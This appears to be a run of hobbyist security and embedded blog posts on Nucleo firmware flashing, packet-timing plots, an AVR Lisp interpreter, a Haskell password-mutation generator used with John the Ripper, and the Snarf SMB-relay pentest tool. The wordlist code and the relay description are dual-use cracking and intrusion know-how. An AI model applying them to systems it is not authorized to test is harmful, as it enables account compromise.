arm-none-eabi-gcc -mcpu=cortex-m4 -mthumb -mfpu=fpv4-sp-d16 -mfloat-abi=softfp -Wl,--gc-sections --specs=nosys.specs -u _printf_float -u _scanf_float -Wl,,--cref -T./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/NUCLEO_F411RE.ld -L./mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM  -o Nucleo_blink_led.elf main.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cryp.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_tim_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_fmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rcc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_smartcard.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pwr_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_fsmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rng.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_eth.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/cmsis_nvic.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_sdmmc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hcd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/hal_tick.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pccard.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dac_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_irda.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sai.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2s_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sram.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_spi.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_adc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_gpio.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash.o 
mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pcd_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/board.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hash.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_adc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_iwdg.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rtc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_nor.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2s.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/system_stm32f4xx.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_sdram.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pcd.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_uart.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2c.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cortex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rtc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_ltdc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_tim.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_ll_usb.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_hash_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_rcc_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/retarget.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/mbed_overrides.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/startup_STM32F41x.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_can.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dma2d.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dac.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_flash_ramfunc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_crc.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_pwr.o 
mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_wwdg.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_i2c_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_cryp_ex.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_nand.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_usart.o mbed/TARGET_NUCLEO_F411RE/TOOLCHAIN_GCC_ARM/stm32f4xx_hal_dcmi.o -lmbed  -lstdc++ -lsupc++ -lm -lc -lgcc -lnosys -lmbed  -lstdc++ -lsupc++ -lm -lc -lgcc -lnosys
arm-none-eabi-size Nucleo_blink_led.elf
   text    data     bss     dec     hex filename
  31456    2244     592   34292    85f4 Nucleo_blink_led.elf
make: warning:  Clock skew detected.  Your build may be incomplete.

The result is several files in your directory that we can use to debug the program and flash the microcontroller:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ ls -l
total 1240
-rw-r--r-- 1 josh josh    214 Nov 30  2014 main.cpp
-rw-rw-r-- 1 josh josh   9446 Nov 30 14:02 main.d
-rw-rw-r-- 1 josh josh  18232 Nov 30 14:02 main.o
-rw-r--r-- 1 josh josh   6884 Nov 30 14:01 Makefile
-rw-r--r-- 1 josh josh   6810 Nov 30 13:57 Makefile.orig
drwxrwxr-x 4 josh josh   4096 Nov 30 13:43 mbed
-rw-r--r-- 1 josh josh     65 Nov 30  2014 mbed.bld
-rwxrwxr-x 1 josh josh  33700 Nov 30 14:02 Nucleo_blink_led.bin
-rwxrwxr-x 1 josh josh 337694 Nov 30 14:02 Nucleo_blink_led.elf
-rw-rw-r-- 1 josh josh  94855 Nov 30 14:02 Nucleo_blink_led.hex
-rw-rw-r-- 1 josh josh 758946 Nov 30 14:02

Flash the Microcontroller

You will use OpenOCD to connect to the SWD (Serial Wire Debug) port, where we can program the microcontroller’s flash memory. Start by connecting to the board using the configuration file for the hardware you’re using:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ openocd -f /usr/local/share/openocd/scripts/board/st_nucleo_f411re.cfg 
Open On-Chip Debugger 0.9.0-dev-00207-g9c4d294 (2014-11-27-10:42)
Licensed under GNU GPL v2
For bug reports, read
Info : The selected transport took over low-level target control. The results might differ compared to plain JTAG/SWD
adapter speed: 2000 kHz
adapter_nsrst_delay: 100
srst_only separate srst_nogate srst_open_drain connect_deassert_srst
Info : clock speed 2000 kHz
Info : STLINK v2 JTAG v22 API v2 SWIM v5 VID 0x0483 PID 0x374B
Info : using stlink api v2
Info : Target voltage: 3.263559
Info : stm32f4x.cpu: hardware has 6 breakpoints, 4 watchpoints

OpenOCD opens some TCP ports that you can use to connect different clients to the microcontroller. For example, on port 3333 is a remote debugger target for GDB (very handy!). We’re most interested in port 4444, though, where we can connect to run commands. Use telnet for this:

josh@ubuntu:~/nucleo/Nucleo_blink_led$ telnet localhost 4444
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger

To program the flash, we need to run three commands. First, we halt the CPU:

> reset halt
target state: halted
target halted due to debug-request, current mode: Thread 
xPSR: 0x01000000 pc: 0x08001ad4 msp: 0x20020000

Now we write the Nucleo_blink_led.hex file to flash memory:

> flash write_image erase Nucleo_blink_led.hex
auto erase enabled
device id = 0x10006431
flash size = 512kbytes
wrote 49152 bytes from file Nucleo_blink_led.hex in 2.165905s (22.162 KiB/s)

And start the CPU at the entry point:

> reset run


And that’s it! It seems like a lot, but my initial testing suggests that the MBED SDK is the best way to hit the ground running with the Nucleo board. This environment lets me use all the normal C-programming infrastructure I’m used to: Emacs for editing, Makefiles for managing the build process, and so on.

One of the nice things is that this gives you the entire MBED SDK in your project directory. Check out the SDK documentation on the MBED site for details on how the different APIs work. You’ll find that in many ways it is more powerful than software frameworks for other embedded environments.

The Shape of Network Traffic

I am working on a (probably foolhardy) project to play with network traffic at a very low level. It’s hardware, so I’m trying to estimate performance: given a CPU with speed X and parallel bus architecture Y on the MAC/PHY, how much time do I have to process a packet, and so on. Estimates are only as good as the information they’re based on, of course, so I collected a network capture from a pretty busy and large network to get some idea of what’s “normal”. I was quite interested in what showed up.

I’ll preface this, also, by saying I have no amazing analysis or conclusion here. Only the observation that there’s some interesting structure in packet flow, and it startled me. I certainly watch the packets fly by in Wireshark often enough, so I thought I had a good idea of what things would look like. I wanted to answer a key question for my project: how many microseconds do I have between packets to analyze (and manipulate) them? This influences decisions I’ll make about packet buffering and how complex I can make the processing stage.

So like I said, I collected this network capture. It’s about two hours of traffic from a production network with between 100 and 200 users. I extracted the timestamps from the PCAP and wrote a quick Ruby script to convert timestamps to delta-t values (and byte sizes, etc.). But how to visualize it? I pulled out GNU R, and thought I’d just try the default plot() command:

plot(d$Delta, pch=16, ylab="Time Between Packets (uS)", main="Plot of Time Deltas")
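For reference, the delta-t conversion I mentioned is simple. Here’s a rough Ruby sketch (not the original script; it assumes the timestamps have already been dumped from the PCAP as fractional epoch seconds):

```ruby
# Given epoch timestamps in seconds (already extracted from the PCAP),
# emit the microsecond gap between each consecutive pair of packets.
def deltas_us(timestamps)
  timestamps.each_cons(2).map { |a, b| ((b - a) * 1_000_000).round }
end

stamps = [0.0, 0.000150, 0.002000]   # illustrative values only
p deltas_us(stamps)                  # gaps of 150 us and 1850 us
```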

That was interesting enough, but I could see several things. First, the data is spread out over a huge range: inter-packet times range from 0 to millions of microseconds. And since lots of the data must be on the lower end, I thought I’d rescale it with a logarithmic Y-axis. This should show me what the bottom looks like:

plot(d$Delta, pch=16, ylab="Time Between Packets (uS)", main="Plot of Time Deltas", log="y")

Wow, that’s just a ton of data. I don’t want to start aggregating it – I did try a histogram, and I basically get one big bar in the first bin and a long tail. Totally useless. Then I remembered a trick I ran into when I was running profitability metrics for delivered services at a previous company where I worked. I had thousands of data points, and I wanted to see instinctively how the shape really worked out. By setting the plotted points with a mostly-transparent color, they don’t just clobber each other like in the above graph. Check this out:

plot(d$Delta, pch=16, log="y", col="#00888803", main="Packet Flow", xlab="Packet Index", ylab="Time Between Packets (uS)")

And there we have it – a fantastic image. It shows that there are common streams of traffic that strike at very regular packet intervals: temporal clusters of packet bursts with nearly constant timing. My guess (without much more complicated, deeper analysis) is that these horizontal stripes correspond to traffic in-subnet, out-of-subnet, or by protocol. For example, TCP acknowledges segments frequently, so a TCP session should show up as pairs (or clusters) of packets tightly associated with each other. I simply had no idea there would be so much obvious structure in this somewhat nonsensical graph.

Here’s where I finally ended up. Based on propagation delay timings for the MAC/PHY chip I am looking at, along with cycle times and MIPS/MHz for the CPU I’m planning to use, I had estimated a worst case of about 600 nanoseconds to read, process, and rewrite each packet byte. So I re-expressed this information as microseconds per byte, and plotted my line. I am confident that with “reasonable” buffering (the MAC/PHY buffers in its own memory, for example), I should be able to keep up with a real-world network.
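To make the budget concrete, here’s the unit conversion behind that line (the packet sizes are illustrative, not from the capture):

```ruby
# ~600 ns to read, process, and rewrite each packet byte, i.e. 0.6 us/byte.
# A packet "fits" without buffering only if the gap before it is at least
# as long as its own processing time.
US_PER_BYTE = 0.6

def processing_time_us(packet_bytes)
  packet_bytes * US_PER_BYTE
end

def keeps_up?(packet_bytes, gap_us)
  gap_us >= processing_time_us(packet_bytes)
end

p processing_time_us(1518)   # ~911 us for a full-size Ethernet frame
p keeps_up?(64, 100.0)       # a minimum-size frame with a 100 us gap
```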

Note also that this basically combines information about packet timing and packet size. I know that this trace includes a variety of interesting traffic:

  1. Port scans (I was portscanned, not doing the portscanning!)
  2. SMB file sharing
  3. Web browsing
  4. Tons of broadcast and multicast

By the way, for extra points, see if you can guess when my box was portscanned by looking at the sequence.

Lisp on an AVR?

I’m working on a new version of my USB HID testing rig. This one is a little more robust – i.e., not consisting of a bundle of Arduino shields and a breadboard. I’ve also started playing with more USB-related things, like using a raw HID to transfer data faster. As I’ve been experimenting, I’ve started thinking about the ultimate in usability. I really want to be able to script the behavior of the device dynamically, without having to reprogram it with new features.

So I worked a bit this evening on a very small Lisp interpreter for the AVR. So far, it’s not even running on the AVR – I’m simulating it on my Linux boxen. But the design of the interpreter is pointed at eventual implementation on AVR hardware.

There are, of course, a number of serious concessions to fit everything in a few kilobytes of RAM. There have been some other projects in this area, but even the most specifically targeted one I can find made too many concessions for my preferences. I want to be able to do things like define variables and iterate – maybe even user-definable functions, though RAM may not be sufficient for that. I envision the final product will allow me to write “builtin” functions in C for the AVR, and drive execution with interpreted kind-of-Lisp.

I will have no garbage collection – can’t afford it – but the interpreter will manage its own memory. By statically mapping a memory range for CONS cells and a symbol table, I can fix hard limits on how far a script can grow. But this will also allow me to ensure that everything fits on the AVR without having to implement malloc() and free().

A CONS cell is (currently) a triple, consisting of a type descriptor (one byte), the car (two bytes), and the cdr (one byte). No, I don’t plan on handling dotted franken-conses. All data types will map back to a cons, and I can calculate how many CONS cells take how much space, and keep it under control.
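As a rough illustration of that layout (the names and pool size here are hypothetical, not the actual interpreter’s), a statically sized pool of four-byte cells might look like this:

```ruby
# Hypothetical sketch of a statically sized cons pool: each cell is four
# bytes (type tag, two-byte car, one-byte cdr index), so total memory use
# is fixed up front -- no malloc()/free() needed on the AVR.
class ConsPool
  CELL_SIZE = 4

  def initialize(max_cells)
    @pool = Array.new(max_cells * CELL_SIZE, 0)  # stands in for a static buffer
    @max  = max_cells
    @free = 0
  end

  # Allocate the next cell and return its index; raising when the pool is
  # exhausted is the hard limit on how far a script can grow.
  def cons(type, car, cdr)
    raise 'out of cons cells' if @free >= @max
    base = @free * CELL_SIZE
    @pool[base]     = type & 0xff
    @pool[base + 1] = (car >> 8) & 0xff   # car, high byte
    @pool[base + 2] = car & 0xff          # car, low byte
    @pool[base + 3] = cdr & 0xff          # cdr is a one-byte cell index
    @free += 1
    @free - 1
  end

  def type(i); @pool[i * CELL_SIZE]; end
  def car(i);  (@pool[i * CELL_SIZE + 1] << 8) | @pool[i * CELL_SIZE + 2]; end
  def cdr(i);  @pool[i * CELL_SIZE + 3]; end
end
```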

Here’s a simple “hello world” example in my current simulator. It’s a little more than hello world – it prints out a string (a sequence of chars) and the result of a little math – but still cool to experiment with how a realistic script might behave:

ULisp VM Test

Mutating Dictionaries

I was dinking around with mutating word lists to make password dictionaries this morning, and ran into a little hitch. Using John the Ripper, you can generate word lists using its mutation rules. It definitely works, as follows:

063014 09:38 :) josh $ wc -l words.txt
29016 words.txt
063014 09:38 :) josh $ john --wordlist=words.txt --rules --stdout > foo.txt
words: 1427525  time: 0:00:00:00 DONE (Fri Jul  4 04:47:53 2014)  w/s: 4758K  current: Zygoting
063014 09:38 :) josh $ wc -l foo.txt
1427525 foo.txt

So an expansion from 29k words to 1.4M words was fine… but there were some obvious ones missing. For example, the famous XKCD base password was missing:

063014 09:38 :) josh $ grep -i troubador words.txt
063014 09:38 :) josh $ grep Tr0ub4dor foo.txt
063014 09:38 :( (1) josh $

Now, I believe that it’s not too hard to modify John’s rules and configure your own. But I never take that path. After all, a day without coding is like a day without sunshine. So I wrote up a few scripts to do my own l33t mutations of dictionary words, and started with the code bumming. I did some timed runs, decided I wasn’t happy with the speed, etc., and then I thought maybe my code was a little long…

I had started with Ruby, but when I decided I wanted it faster I turned to one of my favorite languages, Haskell. It compiles to machine code, and should be about an order of magnitude faster than Ruby. And once I started optimizing, I started pulling out all of the weird little tricks you get with Haskell, and ended up with the following:

import Data.Char
import Data.List

leets = ["oO0*","aA4@","lL1!","eE3" ,"tT7" ,"iI1!","sS5"]

leetchar c []     = nub [c, toUpper c, toLower c]
leetchar c (l:ls) = if c `elem` l then l else leetchar c ls

leet []     = return []
leet (x:xs) = do
  p <- leetchar x leets
  n <- leet xs
  return $ p : n

main = do
  cs <- getContents
  mapM_ putStrLn (concatMap leet (lines cs))

Which works something like this:

$ echo password | ./leetspeak | head -n 10

And I think this was one of the most beautiful programs I have ever written. I’ve used the list monad before, but there’s something special about writing the imperative form of a program several times, then writing a nice functional one, and then having that dawning realization that what I’m trying to optimize is monadic in shape.

You see, the challenge in this program is not necessarily generating the different options for the characters. That’s easy – what’s a bit harder is generating all of the possible combinations of those options. A typical imperative solution keeps some sort of list of the words that have been generated so far and recursively works through each character in the word. This was the general pattern of my first solutions, but the code was so long.

The list monad in Haskell essentially abstracts away all of the boilerplate of that recursive function, and turns the “cartesian product” part of this calculation into a very concise function. My “leet” function from above:

leet []     = return []
leet (x:xs) = do
  p <- leetchar x leets
  n <- leet xs
  return $ p : n

The “bind” operator (the left arrow “<-” in the code above) basically makes the rest of the function into a loop, without having to specify all the loop details. And by making it recursive, I don’t even have to think about how long the word is (so no keeping track of indices and lengths!). By the time you get to the “return $ p : n” line, the program is at the bottom of a nested loop.
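For comparison, here’s roughly what that cartesian product looks like without the list monad, in Ruby (my own translation, not part of the original toolchain) – the explicit fold-and-product step is exactly the boilerplate the monad hides:

```ruby
LEETS = %w[oO0* aA4@ lL1! eE3 tT7 iI1! sS5]

# Per-character options: a character's l33t set if it has one, otherwise
# just its upper/lower-case variants.
def leet_options(c)
  set = LEETS.find { |l| l.include?(c) }
  set ? set.chars : [c, c.upcase, c.downcase].uniq
end

# The explicit cartesian product: fold across the word, crossing the
# words-so-far with each character's options.
def leet(word)
  word.chars
      .map { |c| leet_options(c) }
      .reduce(['']) { |acc, opts| acc.product(opts).map(&:join) }
end

p leet('so').length   # 3 options for 's' times 4 for 'o' = 12 variants
```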

And what’s cool about the whole program (being as short as it is) is that GHC compiles it into a very performant little binary. It takes me about half a minute to generate a gigabyte of mutated passwords, and thanks to lazy evaluation it never takes more than a couple megabytes of memory (mostly Haskell runtime overhead, not data). Note that I’m also mutating case on all characters as well.

$ ./leetspeak < words.txt > dictionary.txt
$ wc -l dictionary.txt
 102395717 dictionary.txt

It’s not significant to “security”, but it’s at least a little reminder that there is always a best tool for any given job, and when you stumble onto the “right” solution it’s very satisfying.

Snarf Presentation at NOLAcon

tl;dr → Check out github and the NOLAcon 2014 presentation.

My esteemed colleague, Victor Mata, and I had the privilege to present our long-time research project, Snarf, at NOLAcon this past weekend. It was great to get everything together to share with others. Coincident with this presentation is the Github release of our source code, so others can experiment with the tool as well.

What is Snarf, you might ask? Think about SMB Relay (e.g., via the Spider Labs Responder), one of the most profitable attacks in the present penetration testing environment. This popular attack is supported by several tools, but is often sort of a “fire and forget” attack. If you happen to get an SMB connection, and it happens to be an admin user, and you happen to choose a system that doesn’t have AV (or you happened to choose a good payload), then it works, and you get control of a system on the network.

But what if it doesn’t happen so cleanly? Victor and I were frustrated that attacks like these are often a “one-shot” deal. We wanted to move SMB Relay from the exploitation phase to the discovery phase, and try to get utility out of middled connections that aren’t quite in the “sweet spot” described above. E.g., if you don’t have admin, you can at least still look at shares. And there are lots of SMB tools you might want to try – why can’t SMB relay let you do more?

Well, it can, but it took us a good bit of work. Along the way, we produced Snarf – a tool that middles a connection to an SMB server, but keeps the server connection when the client is done with it. We then present a localhost SMB server that authenticates any username/password, but then jacks in directly to the existing server connection that we stole from the client. You can connect any number of times, with any SMB tool (as long as it speaks the right dialect), experiment with payloads or post-exploitation exploration – all with only one connection. We just never throw away a usable connection!

What’s also cool is that this applies to lots of protocols. We have some working beta-ish code for MySQL, which we presented in our talk at NOLAcon (not integrated into the public source yet). The possibilities are really exciting for effectively demonstrating the need to secure network services during penetration tests.

For a little more, check out our NOLAcon 2014 presentation. You can also check out the (beta) code on Github.